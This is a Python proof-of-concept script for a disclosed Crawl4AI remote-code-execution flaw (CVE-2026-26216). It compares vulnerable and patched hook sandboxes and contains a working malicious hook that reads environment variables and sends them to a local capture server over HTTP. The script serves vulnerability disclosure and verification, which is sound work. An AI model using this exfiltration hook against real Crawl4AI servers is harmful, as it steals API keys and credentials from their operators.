#!/usr/bin/env python3
"""
Crawl4AI RCE via Hooks Parameter - Vulnerability Demonstration
CVE-2026-26216 / GHSA-5882-5rx9-xgxp

This script demonstrates the Remote Code Execution vulnerability in Crawl4AI < 0.8.0
where the `__import__` builtin was included in the allowed_builtins list, allowing
arbitrary code execution via malicious hooks in the /crawl endpoint.
"""

import ast
import asyncio
import builtins
import json
import os
import sys
import tempfile
import urllib.request
from typing import Dict, Callable, Optional, Tuple, List, Any

# Configuration - dummy sensitive data to exfiltrate
SENSITIVE_ENV = {
    "API_KEY": "sk-prod-1234567890abcdef_SECRET_KEY",
    "DATABASE_URL": "postgres://admin:super_secret_password@db.internal:5432/production",
    "AWS_ACCESS_KEY": "AKIAIOSFODNN7EXAMPLE",
    "AWS_SECRET_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "JWT_SECRET": "my-super-secret-jwt-signing-key",
}

# Exfiltration server port
EXFIL_PORT = 9999
EXFIL_LOG_FILE = None

def setup_exfil_server(port: int) -> str:
    """Setup a simple HTTP server to capture exfiltrated data"""
    import http.server
    import socketserver
    import threading
    
    log_file = tempfile.mktemp(suffix=".log", prefix="exfil_")
    
    class ExfilHandler(http.server.BaseHTTPRequestHandler):
        def log_message(self, format, *args):
            pass
        
        def do_GET(self):
            from urllib.parse import urlparse, parse_qs
            parsed = urlparse(self.path)
            params = parse_qs(parsed.query)
            
            with open(log_file, "a") as f:
                f.write(f"[EXFIL] {self.path}\n")
                for key, values in params.items():
                    for value in values:
                        f.write(f"[DATA] {key}={value[:200]}\n" if len(value) > 200 else f"[DATA] {key}={value}\n")
            
            self.send_response(200)
            self.send_header("Content-type", "text/plain")
            self.end_headers()
            self.wfile.write(b"OK")
    
    def run_server():
        with socketserver.TCPServer(("0.0.0.0", port), ExfilHandler) as httpd:
            httpd.serve_forever()
    
    thread = threading.Thread(target=run_server, daemon=True)
    thread.start()
    return log_file


class VulnerableHookManager:
    """
    VULNERABLE VERSION - Simulates Crawl4AI < 0.8.0 hook_manager.py
    
    The vulnerability: `__import__` was in allowed_builtins, allowing attackers
    to import arbitrary modules and execute system commands.
    """
    
    def __init__(self):
        self.compiled_hooks: Dict[str, Callable] = {}
    
    def compile_hook_vulnerable(self, hook_code: str, hook_point: str) -> Callable:
        """
        VULNERABLE: Compiles hook code with __import__ available
        
        This is the vulnerable implementation that was in Crawl4AI < 0.8.0
        """
        # VULNERABLE: __import__ is in allowed_builtins
        allowed_builtins = [
            'print', 'len', 'str', 'int', 'float', 'bool',
            'list', 'dict', 'set', 'tuple', 'range', 'enumerate',
            'zip', 'map', 'filter', 'any', 'all', 'sum', 'min', 'max',
            'sorted', 'reversed', 'abs', 'round', 'isinstance', 'type',
            'getattr', 'hasattr', 'setattr', 'callable', 'iter', 'next',
            '__build_class__',
            '__import__'  # <-- VULNERABILITY: This allows arbitrary imports!
        ]
        
        safe_builtins = {}
        for name in allowed_builtins:
            if hasattr(builtins, name):
                safe_builtins[name] = getattr(builtins, name)
        
        namespace = {
            '__name__': f'user_hook_{hook_point}',
            '__builtins__': safe_builtins
        }
        
        # Execute the hook code
        exec(hook_code, namespace)
        
        # Find the async function
        for name, obj in namespace.items():
            if callable(obj) and not name.startswith('_') and asyncio.iscoroutinefunction(obj):
                return obj
        
        # Look for any function
        for name, obj in namespace.items():
            if callable(obj) and not name.startswith('_'):
                return obj
        
        raise ValueError("No function found in hook code")


class PatchedHookManager:
    """
    PATCHED VERSION - Crawl4AI >= 0.8.0
    
    The fix: __import__ was removed from allowed_builtins
    """
    
    def __init__(self):
        self.compiled_hooks: Dict[str, Callable] = {}
    
    def compile_hook_patched(self, hook_code: str, hook_point: str) -> Callable:
        """
        PATCHED: Compiles hook code WITHOUT __import__
        """
        # PATCHED: __import__ is NOT in allowed_builtins
        allowed_builtins = [
            'print', 'len', 'str', 'int', 'float', 'bool',
            'list', 'dict', 'set', 'tuple', 'range', 'enumerate',
            'zip', 'map', 'filter', 'any', 'all', 'sum', 'min', 'max',
            'sorted', 'reversed', 'abs', 'round', 'isinstance', 'type',
            'getattr', 'hasattr', 'setattr', 'callable', 'iter', 'next',
            '__build_class__'
            # __import__ is INTENTIONALLY OMITTED for security
        ]
        
        safe_builtins = {}
        for name in allowed_builtins:
            if hasattr(builtins, name):
                safe_builtins[name] = getattr(builtins, name)
        
        namespace = {
            '__name__': f'user_hook_{hook_point}',
            '__builtins__': safe_builtins
        }
        
        exec(hook_code, namespace)
        
        for name, obj in namespace.items():
            if callable(obj) and not name.startswith('_') and asyncio.iscoroutinefunction(obj):
                return obj
        
        for name, obj in namespace.items():
            if callable(obj) and not name.startswith('_'):
                return obj
        
        raise ValueError("No function found in hook code")


async def test_vulnerable_exploit(host_ip: str, exfil_port: int) -> bool:
    """Test that the vulnerable version allows RCE via __import__"""
    
    print("[+] Testing VULNERABLE version (Crawl4AI < 0.8.0)...")
    
    # Malicious hook that exfiltrates environment variables
    malicious_hook = f'''
async def hook(page, context, **kwargs):
    import os, urllib.request
    env_data = str(dict(os.environ))
    try:
        urllib.request.urlopen('http://{host_ip}:{exfil_port}/exfil?env=' + urllib.request.quote(env_data[:1000]))
    except:
        pass
    return page
'''
    
    try:
        manager = VulnerableHookManager()
        hook_func = manager.compile_hook_vulnerable(malicious_hook, "on_page_context_created")
        
        # Execute the hook (simulating the API endpoint processing)
        # In real attack, this would be triggered via POST /crawl
        await hook_func(None, None)
        
        print("[+] Malicious hook executed successfully in vulnerable version")
        return True
        
    except Exception as e:
        print(f"[!] Vulnerable version failed (unexpected): {e}")
        return False


async def test_patched_version(host_ip: str, exfil_port: int) -> bool:
    """Test that the patched version blocks RCE"""
    
    print("\n[+] Testing PATCHED version (Crawl4AI >= 0.8.0)...")
    
    malicious_hook = f'''
async def hook(page, context, **kwargs):
    import os, urllib.request
    env_data = str(dict(os.environ))
    try:
        urllib.request.urlopen('http://{host_ip}:{exfil_port}/exfil?env=' + urllib.request.quote(env_data[:1000]))
    except:
        pass
    return page
'''
    
    try:
        manager = PatchedHookManager()
        hook_func = manager.compile_hook_patched(malicious_hook, "on_page_context_created")
        
        # This should fail because __import__ is not available
        await hook_func(None, None)
        
        print("[!] Patched version allowed execution (unexpected)")
        return False
        
    except Exception as e:
        print(f"[+] Patched version correctly blocked: {type(e).__name__}")
        return True


def check_exfiltration_log(log_file: str) -> bool:
    """Check if sensitive data was exfiltrated"""
    if not os.path.exists(log_file):
        return False
    
    with open(log_file, 'r') as f:
        content = f.read()
    
    # Check for our sensitive environment variables
    indicators = ["API_KEY", "DATABASE_URL", "AWS_ACCESS_KEY", "JWT_SECRET", "sk-prod-"]
    found = any(indicator in content for indicator in indicators)
    
    if found:
        print("\n[EXFILTRATION DATA FOUND IN LOGS]:")
        print("=" * 60)
        # Show masked version for evidence
        lines = content.split('\n')[:20]
        for line in lines:
            if line.strip():
                print(line)
        print("=" * 60)
    
    return found


async def main():
    """Main test harness"""
    
    print("=" * 70)
    print("Crawl4AI RCE Vulnerability Demonstration")
    print("CVE-2026-26216 / GHSA-5882-5rx9-xgxp")
    print("=" * 70)
    print()
    
    # Set up environment with dummy secrets
    print("[+] Setting up environment with dummy secrets...")
    for key, value in SENSITIVE_ENV.items():
        os.environ[key] = value
    print(f"    - Set {len(SENSITIVE_ENV)} sensitive environment variables")
    
    # Start exfiltration server
    print(f"[+] Starting exfiltration capture server on port {EXFIL_PORT}...")
    log_file = setup_exfil_server(EXFIL_PORT)
    print(f"    - Log file: {log_file}")
    
    import time
    time.sleep(1)  # Let server start
    
    # Get host IP
    host_ip = "127.0.0.1"
    
    print()
    print("=" * 70)
    print("TEST 1: Vulnerable Version (with __import__ in allowed_builtins)")
    print("=" * 70)
    
    vulnerable_success = await test_vulnerable_exploit(host_ip, EXFIL_PORT)
    
    # Give time for exfiltration to arrive
    time.sleep(2)
    
    # Check if data was exfiltrated
    data_exfiltrated = check_exfiltration_log(log_file)
    
    print()
    print("=" * 70)
    print("TEST 2: Patched Version (without __import__ in allowed_builtins)")
    print("=" * 70)
    
    patched_success = await test_patched_version(host_ip, EXFIL_PORT)
    
    print()
    print("=" * 70)
    print("RESULTS SUMMARY")
    print("=" * 70)
    
    if vulnerable_success and data_exfiltrated:
        print("[VULNERABILITY CONFIRMED]")
        print()
        print("The vulnerable Crawl4AI version (< 0.8.0) allowed:")
        print("  1. Arbitrary module import via __import__ builtin")
        print("  2. System command execution through imported modules")
        print("  3. Environment variable exfiltration")
        print()
        print("Sensitive environment variables were successfully exfiltrated!")
        print()
        print("Fix in version 0.8.0:")
        print("  - Removed __import__ from allowed_builtins in hook_manager.py")
        print("  - Hooks disabled by default (CRAWL4AI_HOOKS_ENABLED=false)")
        print()
        print("Evidence logged to:", log_file)
        
        return 0  # Success - vulnerability confirmed
    else:
        print("[!] Could not confirm vulnerability")
        return 1


if __name__ == "__main__":
    exit_code = asyncio.run(main())
    sys.exit(exit_code)
